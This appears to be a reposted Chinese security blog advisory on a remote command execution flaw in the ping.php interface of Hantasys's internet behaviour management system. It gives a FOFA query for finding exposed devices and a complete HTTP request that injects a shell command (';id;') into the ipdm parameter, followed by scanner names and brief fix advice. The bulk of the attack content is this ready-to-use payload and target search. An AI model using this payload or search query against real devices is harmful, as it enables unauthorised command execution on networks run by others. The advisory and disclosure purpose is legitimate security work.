汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞 POC

admin 2025年1月21日00:03:19评论21 views字数 811阅读2分42秒阅读模式
00

产品简介
汉塔科技是一家专注于网络应用软件开发的公司,在网络安全、网络协议分析以及网络数据流控制等领域拥有丰富的经验和雄厚的技术实力。其上网行为管理系统是应用识别丰富、网络安全防护强大的专业设备之一,汉塔科技上网行为管理系统是一款功能强大、应用识别丰富且易于操作的专业设备。它能够帮助网络管理者全面监控和管理用户的上网行为,确保网络环境的安全和稳定。

01
漏洞概述

汉塔科技-上网行为管理系统 ping.php 接口存在远程命令执行漏洞,经过身份验证的恶意攻击者可以利用该漏洞远程执行任意命令,获取系统权限。

02
搜索引擎
FOFA:
body="Antasys"
汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞 POC
03
漏洞复现
汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞 POC
POC
GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
Host: 
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=515a7b9608e8a01fd03889ccf28bf590
Upgrade-Insecure-Requests: 1
04
自查工具

nuclei

汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞 POC

afrog

汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞 POC

xray

汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞 POC
05
修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

06

原文始发于微信公众号(nday POC):汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月21日00:03:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞 POChttps://cn-sec.com/archives/3651280.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息